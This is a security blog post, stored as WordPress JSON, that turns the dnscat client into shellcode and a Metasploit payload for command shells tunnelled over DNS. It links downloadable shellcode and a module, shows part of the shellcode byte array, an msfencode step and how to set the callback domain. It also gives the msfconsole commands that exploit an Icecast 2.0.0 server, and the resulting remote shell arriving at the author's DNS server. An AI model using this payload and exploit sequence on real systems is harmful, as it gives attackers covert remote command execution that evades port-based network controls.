{"id":8,"date":"2015-03-28T09:50:38","date_gmt":"2015-03-28T09:50:38","guid":{"rendered":"http:\/\/piratesecurityblog.com\/?p=8"},"modified":"2016-09-28T09:50:48","modified_gmt":"2016-09-28T09:50:48","slug":"weaponizing-dnscat-with-shellcode-and-metasploit","status":"publish","type":"post","link":"http:\/\/piratesecurityblog.com\/?p=8","title":{"rendered":"Weaponizing dnscat with shellcode and Metasploit"},"content":{"rendered":"<p>I&#8217;ve been letting other projects slip these last couple weeks because I was excited about converting dnscat into shellcode (or &#8220;weaponizing dnscat&#8221;, as I enjoy saying). Even though I got into the security field with reverse engineering and writing hacks for games, I have never written more than a couple lines of x86 at a time, nor have I ever written shellcode, so this was an awesome learning experience. Most people start by writing shellcode that spawns a local shell; I decided to start with shellcode that implements a dnscat client in under 1024 bytes (for both Linux and Windows). Like I always say, go big or go home!<br \/>\n<span id=\"more-611\"><\/span><br \/>\nIf you just want to grab the files, here are some links:<\/p>\n<ul>\n<li><a href=\"https:\/\/blog.skullsecurity.org\/blogdata\/dnscat-shell-win32.asm\">Win32 shellcode &#8211; assembler<\/a><\/li>\n<li><a href=\"https:\/\/blog.skullsecurity.org\/blogdata\/dnscat-shell-win32\">Win32 shellcode &#8211; binary<\/a><\/li>\n<li><a href=\"https:\/\/blog.skullsecurity.org\/blogdata\/dnscat-shell-win32.h\">Win32 shellcode &#8211; C array<\/a><\/li>\n<li><a href=\"https:\/\/blog.skullsecurity.org\/blogdata\/dnscat-shell-win32.rb\">Win32 Metasploit module<\/a><\/li>\n<li><a href=\"https:\/\/blog.skullsecurity.org\/blogdata\/dnscat-shell-linux.asm\">Linux shellcode &#8211; assembler<\/a><\/li>\n<li><a href=\"https:\/\/blog.skullsecurity.org\/blogdata\/dnscat-shell-linux\">Linux shellcode &#8211; binary<\/a><\/li>\n<li><a href=\"https:\/\/blog.skullsecurity.org\/blogdata\/dnscat-shell-linux.h\">Linux shellcode &#8211; C array<\/a><\/li>\n<\/ul>\n<p>If you want to get your hands dirty, you can compile the source &#8212; right now, it&#8217;s only in svn:<\/p>\n<pre>svn co http:\/\/svn.skullsecurity.org:81\/ron\/security\/nbtool\r\ncd nbtool\r\nmake<\/pre>\n<p>That&#8217;ll compile both the standard dnscat client\/server and, if you have nasm installed, the Linux and Windows shellcodes. On Windows, you&#8217;ll need nasm to assemble it. I installed Cygwin, but you can compile the Windows shellcode on Linux or vice versa if you prefer. The output will be in samples\/shellcode-*\/. A .h file containing the C version will be generated, as well:<\/p>\n<pre>$ head -n3 dnscat-shell-test.h\r\nchar shellcode[] =\r\n        \"\\xe9\\xa2\\x01\\x00\\x00\\x5d\\x81\\xec\\x00\\x04\\x00\\x00\\xe8\\x4e\\x03\\x00\"\r\n        \"\\x00\\x31\\xdb\\x80\\xc3\\x09\\x89\\xef\\xe8\\x2e\\x03\\x00\\x00\\x80\\xc3\\x06\"\r\n...\r\n<\/pre>\n<p>And, of course, the raw file is output (without an extension), that can be run through msfencode or embedded into a script:<\/p>\n<pre> $ make\r\n[...]\r\n$ wc -c samples\/shellcode-win32\/dnscat-shell-win32\r\n997 samples\/shellcode-win32\/dnscat-shell-win32\r\n$ wc -c samples\/shellcode-linux\/dnscat-shell-linux\r\n988 samples\/shellcode-linux\/dnscat-shell-linux\r\n<\/pre>\n<p>Unless you want to be sending your cmd.exe (or sh) shell to skullseclabs.org, you&#8217;ll have to modify the domain as well &#8212; the very last line in the assembly code for both Windows and Linux is this:<\/p>\n<pre>get_domain:\r\n call get_domain_top\r\n db 1, 'a' ; random\r\n db 12,'skullseclabs' ; &lt;-- To modify domain, change this...\r\n db 3,'org' ; &lt;-- and this. The number is the section length.\r\n db 0\r\n<\/pre>\n<p>The two lines with the domain have to be changed. The number preceding the name is, as the comment says, the length of the section (&#8216;skullseclabs&#8217; is 12 bytes, and &#8216;org&#8217; is 3 bytes). This process is automated with the Metasploit payload, as you&#8217;ll see.<\/p>\n<h2>Encoding with msfencode<\/h2>\n<p>msfencode from the Metasploit project is a beautiful utility. I highly recommend running shellcode through it before using it. The most useful aspect with shellcode is, at least to me, the ability to eliminate characters. So, if I need to get rid of \\x00 (null) characters from my strings, it&#8217;s as easy as:<\/p>\n<pre>$ msfencode -b \"\\x00\" &lt; dnscat-shell-win32 &gt; dnscat-shell-win32-encoded\r\n[*] x86\/shikata_ga_nai succeeded with size 1024 (iteration=1)\r\n<\/pre>\n<p>If you&#8217;re planning on using this in, for example, Metasploit, you don&#8217;t have to worry about the msfencode step &#8212; it&#8217;ll do that for you.<\/p>\n<h2>Metasploit payload<\/h2>\n<p>Speaking of metasploit, yes! I wrote a metasploit payload for dnscat.<\/p>\n<p>First, there are a number of caveats:<\/p>\n<ul>\n<li>This is highly experimental<\/li>\n<li>This doesn&#8217;t have a proper &#8220;exitfunc&#8221; call &#8212; it just returns and probably crashes the process<\/li>\n<li>This is set up as a single stage, right now, and is 1000 or so bytes &#8212; as a result, it won&#8217;t work against most vulnerabilities<\/li>\n<li>The dnscat server isn&#8217;t part of Metasploit, yet, so you&#8217;ll have to compile run it separately<\/li>\n<\/ul>\n<p>That being said, it also works great when it&#8217;s usable. The target I use for testing is <a href=\"http:\/\/downloads.xiph.org\/releases\/icecast\/icecast2_win32_2.0.0_setup.exe\">Icecast 2 version 2.0.0<\/a> (WARNING: don&#8217;t install vulnerable software on anything important!), which is included on the SANS 560 and 504 CDs (thanks Ed!). It&#8217;s free, GPL, reliable, and has 2000 bytes in which to stuff the payload.<\/p>\n<p>So, the steps you need to take are,<\/p>\n<ol>\n<ol>\n<li>Install <a href=\"http:\/\/downloads.xiph.org\/releases\/icecast\/icecast2_win32_2.0.0_setup.exe\">Icecast2<\/a> on your victim machine (Win32)<\/li>\n<li>Download the experimental dnscat <a href=\"https:\/\/blog.skullsecurity.org\/blogdata\/dnscat-shell-win32.rb\">Metasploit module<\/a> and put it in your Metasploit directory (modules\/payloads\/singles\/windows\/)<\/li>\n<li>Fire up a dnscat server on your authoritative DNS server (<tt>dnscat --listen<\/tt>) &#8212; see the <a href=\"https:\/\/blog.skullsecurity.org\/wiki\/index.php\/Dnscat\">dnscat wiki<\/a> for more information<\/li>\n<li>Run Metasploit (<tt>msfconsole<\/tt>) and enter the following commands:<\/li>\n<\/ol>\n<\/ol>\n<pre>msf &gt; use exploit\/windows\/http\/icecast_header\r\n\r\nmsf exploit(icecast_header) &gt; set PAYLOAD windows\/dnscat-shell-win32\r\nPAYLOAD =&gt; windows\/dnscat-shell-win32\r\n\r\nmsf exploit(icecast_header) &gt; set RHOST 192.168.1.221\r\nRHOST =&gt; 192.168.1.221\r\n\r\nmsf exploit(icecast_header) &gt; set DOMAIN skullseclabs.org\r\nDOMAIN =&gt; skullseclabs.org\r\n\r\nmsf exploit(icecast_header) &gt; exploit\r\n[*] Exploit completed, but no session was created.\r\n<\/pre>\n<p>Meanwhile, on your dnscat server, if all went well, you should see:<\/p>\n<pre>$ sudo .\/dnscat --listen\r\nWaiting for DNS requests for domain '*' on 0.0.0.0:53...\r\nSwitching stream -&gt; datagram\r\nMicrosoft Windows [Version 5.2.3790]\r\n(C) Copyright 1985-2003 Microsoft Corp.\r\n\r\nC:\\Program Files\\Icecast2 Win32&gt;\r\n<\/pre>\n<p>You can type commands in, and they&#8217;ll run just like a normal shell. Be warned, though, that it is somewhat slow, due to the nature of going through DNS.<\/p>\n<h2>Why bother?<\/h2>\n<p>The big advantage to this over traditional shellcode is that no port, whether inbound or outbound, is required! As long as the server has a DNS server set that will perform recursive lookups, it&#8217;ll work great!<\/p>\n<h2>Feedback<\/h2>\n<p>As I said, this is the first time I&#8217;ve ever written shellcode or x86. I&#8217;m sure there are lots of places where it could be significantly improved, and I&#8217;d love to hear feedback from the folks who really know what they&#8217;re doing and can help me improve my code.<\/p>\n<p>Thanks!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>I&#8217;ve been letting other projects slip these last couple weeks because I was excited about converting dnscat into shellcode (or &#8220;weaponizing dnscat&#8221;, as I enjoy saying). Even though I got into the security field with reverse engineering and writing hacks for games, I have never written more than a couple lines of x86 at a &hellip; <a href=\"http:\/\/piratesecurityblog.com\/?p=8\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">Weaponizing dnscat with shellcode and Metasploit<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[5],"tags":[],"_links":{"self":[{"href":"http:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/posts\/8"}],"collection":[{"href":"http:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/piratesecurityblog.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8"}],"version-history":[{"count":1,"href":"http:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/posts\/8\/revisions"}],"predecessor-version":[{"id":9,"href":"http:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/posts\/8\/revisions\/9"}],"wp:attachment":[{"href":"http:\/\/piratesecurityblog.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/piratesecurityblog.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/piratesecurityblog.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}